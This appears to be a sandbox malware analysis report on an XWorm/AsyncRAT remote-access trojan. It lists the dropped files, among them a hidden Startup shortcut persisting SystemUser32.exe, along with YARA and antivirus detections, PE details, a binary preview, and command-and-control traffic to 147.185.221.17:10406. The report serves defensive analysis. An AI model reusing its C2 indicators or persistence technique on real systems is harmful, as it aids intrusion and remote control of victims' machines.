                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jurk0fvy.tld.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lijzqe3b.izd.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3w1vu2f.lut.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojecfqkw.mcy.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_puilwnav.hrq.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpn2x3ey.11u.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vioik40p.ui3.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yt5uzngo.jiz.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxfh1zpl.eex.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemUser32.lnk

                                              Download File
                                              Process:C:\Users\user\Desktop\5q4X9fRo4b.exe
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Oct 9 21:42:43 2024, mtime=Wed Oct 9 21:42:43 2024, atime=Wed Oct 9 21:42:43 2024, length=42496, window=hide
                                              Category:dropped
                                              Size (bytes):795
                                              Entropy (8bit):5.121964746864871
                                              Encrypted:false
                                              SSDEEP:12:8Iq4JSN+2Ch/i1Y//bouLD20zKI8eGEKfEWKlZjA7NHtBR+fEWKlpd5zBmV:8+V2c9RDzKIZGEyKldAfH+3Klpd5tm
                                              MD5:7135E092938FAA11E6F00C551234F3B3
                                              SHA1:DA0EB051C10281506CD928561ADBEB2DED16A4C6
                                              SHA-256:1D1C78C6C1AA411DF1579091397C757CBA7AF23FEF7A781BF5897C0FB8FA76BE
                                              SHA-512:98741AFD6F6CC95921D60F9BB7DD843039E23DE015B401B8A893E86F01EF29A1ECAE06C71938B23EB9E1529CF8CB48F872650FD6959B2D6EF5C2EC7C127E44E7
                                              Malicious:false
                                              Preview:L..................F.... ............!........................................:..DG..Yr?.D..U..k0.&...&......Qg.*_..........#]..........t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=IYL...........................3*N.A.p.p.D.a.t.a...B.V.1.....IY|...Roaming.@......EW.=IY|...............................R.o.a.m.i.n.g.....n.2.....IYV. .SYSTEM~1.EXE..R......IYV.IYV.....<'....................`...S.y.s.t.e.m.U.s.e.r.3.2...e.x.e.......b...............-.......a............W.O.....C:\Users\user\AppData\Roaming\SystemUser32.exe........\.....\.....\.....\.....\.S.y.s.t.e.m.U.s.e.r.3.2...e.x.e.`.......X.......899552...........hT..CrF.f4... ..........,......hT..CrF.f4... ..........,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                              C:\Users\user\AppData\Roaming\SystemUser32.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\5q4X9fRo4b.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):42496
                                              Entropy (8bit):5.552475995005772
                                              Encrypted:false
                                              SSDEEP:768:LrJDweBDuOkScrbsN/x6etCAr43MxfJF5Pa9p+M6iOwhk3/ibh:pDwewicrbsN/YSRrNRF49IM6iOwKa9
                                              MD5:9425780161C1CB105CD206D3F4FC6FA8
                                              SHA1:20608510EF22B09E5E874268B61D726AC0218C45
                                              SHA-256:AF9CE09585744C97E4C856C8E6124D8A842714DFD5101E27EAFF721220679802
                                              SHA-512:DE6AE6BD447FD34262ECC0F0FADD287EB17BD22CC0F775102233DE8A1B18B45B920ECBF94DB6540D1F9AB9E5FD21AFF6F8939D0C51D7574C1FAE1A1181E56F71
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: Joe Security
                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: ditekSHen
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 84%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f..g................................. ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......D^...[............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):5.552475995005772
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:5q4X9fRo4b.exe
                                              File size:42'496 bytes
                                              MD5:9425780161c1cb105cd206d3f4fc6fa8
                                              SHA1:20608510ef22b09e5e874268b61d726ac0218c45
                                              SHA256:af9ce09585744c97e4c856c8e6124d8a842714dfd5101e27eaff721220679802
                                              SHA512:de6ae6bd447fd34262ecc0f0fadd287eb17bd22cc0f775102233de8a1b18b45b920ecbf94db6540d1f9ab9e5fd21aff6f8939d0c51d7574c1fae1a1181e56f71
                                              SSDEEP:768:LrJDweBDuOkScrbsN/x6etCAr43MxfJF5Pa9p+M6iOwhk3/ibh:pDwewicrbsN/YSRrNRF49IM6iOwKa9
                                              TLSH:04133A457BE44216D5FFABF918B362060B70F6038D13D79E4CD89A9B1B37B808A01BD6
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f..g................................. ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:00928e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x40ba1e
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6705E266 [Wed Oct 9 01:54:46 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb9c40x57.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x510.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x9a240x9c00743abcb702ffadf53d78bb160244a199False0.48717948717948717data5.664155435394303IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xc0000x5100x600a17e9966a71bebc4a0c726e8a0465682False0.3854166666666667data3.8100922809276163IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xe0000xc0x200229088d024621b8eb6aa4c77f9d0b766False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0xc0a00x27cdata0.4559748427672956
                                              RT_MANIFEST0xc3200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-10-09T23:05:13.613687+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1710406192.168.2.749933TCP
                                              2024-10-09T23:05:13.613687+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.1710406192.168.2.749933TCP
                                              2024-10-09T23:05:13.801889+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.749933147.185.221.1710406TCP
                                              2024-10-09T23:05:14.081790+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1710406192.168.2.749933TCP
                                              2024-10-09T23:05:14.091945+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749933147.185.221.1710406TCP
                                              2024-10-09T23:05:26.994236+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1710406192.168.2.749933TCP
                                              2024-10-09T23:05:26.995996+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749933147.185.221.1710406TCP
                                              2024-10-09T23:05:39.903187+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1710406192.168.2.749933TCP
                                              2024-10-09T23:05:39.905710+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749933147.185.221.1710406TCP
                                              2024-10-09T23:05:43.622791+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1710406192.168.2.749933TCP
                                              2024-10-09T23:05:43.622791+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.1710406192.168.2.749933TCP
                                              2024-10-09T23:05:52.835200+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1710406192.168.2.749933TCP
                                              2024-10-09T23:05:52.837470+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749933147.185.221.1710406TCP
                                              2024-10-09T23:06:05.732794+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1710406192.168.2.749933TCP
                                              2024-10-09T23:06:05.734423+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749933147.185.221.1710406TCP
                                              2024-10-09T23:06:13.629708+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1710406192.168.2.749933TCP
                                              2024-10-09T23:06:13.629708+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.1710406192.168.2.749933TCP
                                              2024-10-09T23:06:14.794101+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.1710406192.168.2.749933TCP
                                              2024-10-09T23:06:14.794890+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749933147.185.221.1710406TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 9, 2024 23:04:08.100456953 CEST4969980192.168.2.7208.95.112.1
                                              Oct 9, 2024 23:04:08.105391979 CEST8049699208.95.112.1192.168.2.7
                                              Oct 9, 2024 23:04:08.105482101 CEST4969980192.168.2.7208.95.112.1
                                              Oct 9, 2024 23:04:08.106169939 CEST4969980192.168.2.7208.95.112.1
                                              Oct 9, 2024 23:04:08.111644030 CEST8049699208.95.112.1192.168.2.7
                                              Oct 9, 2024 23:04:08.622498989 CEST8049699208.95.112.1192.168.2.7
                                              Oct 9, 2024 23:04:08.668478012 CEST4969980192.168.2.7208.95.112.1
                                              Oct 9, 2024 23:04:43.592120886 CEST8049699208.95.112.1192.168.2.7
                                              Oct 9, 2024 23:04:43.592474937 CEST4969980192.168.2.7208.95.112.1
                                              Oct 9, 2024 23:05:00.806761980 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:05:00.811660051 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:00.811760902 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:05:00.883759975 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:05:00.889024019 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:13.613687038 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:13.668839931 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:05:13.801888943 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:05:13.806809902 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:14.081789970 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:14.091944933 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:05:14.096755028 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:26.716007948 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:05:26.721092939 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:26.994235992 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:26.995995998 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:05:27.002087116 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:39.638457060 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:05:39.643407106 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:39.903187037 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:39.905709982 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:05:39.910717010 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:43.622791052 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:43.669022083 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:05:48.654572964 CEST4969980192.168.2.7208.95.112.1
                                              Oct 9, 2024 23:05:48.965852022 CEST4969980192.168.2.7208.95.112.1
                                              Oct 9, 2024 23:05:49.575239897 CEST4969980192.168.2.7208.95.112.1
                                              Oct 9, 2024 23:05:50.778383970 CEST4969980192.168.2.7208.95.112.1
                                              Oct 9, 2024 23:05:52.559967995 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:05:52.564876080 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:52.835200071 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:52.837470055 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:05:52.842420101 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:05:53.184623003 CEST4969980192.168.2.7208.95.112.1
                                              Oct 9, 2024 23:05:57.997210026 CEST4969980192.168.2.7208.95.112.1
                                              Oct 9, 2024 23:06:05.466459036 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:06:05.471548080 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:06:05.732794046 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:06:05.734422922 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:06:05.739315987 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:06:07.606890917 CEST4969980192.168.2.7208.95.112.1
                                              Oct 9, 2024 23:06:13.629708052 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:06:13.684711933 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:06:14.373671055 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:06:14.536256075 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:06:14.794101000 CEST1040649933147.185.221.17192.168.2.7
                                              Oct 9, 2024 23:06:14.794889927 CEST4993310406192.168.2.7147.185.221.17
                                              Oct 9, 2024 23:06:14.800748110 CEST1040649933147.185.221.17192.168.2.7

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 9, 2024 23:04:08.086519003 CEST6033453192.168.2.71.1.1.1
                                              Oct 9, 2024 23:04:08.093835115 CEST53603341.1.1.1192.168.2.7

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Oct 9, 2024 23:04:08.086519003 CEST192.168.2.71.1.1.10x5644Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Oct 9, 2024 23:04:08.093835115 CEST1.1.1.1192.168.2.70x5644No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • ip-api.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.749699208.95.112.1801408C:\Users\user\Desktop\5q4X9fRo4b.exe
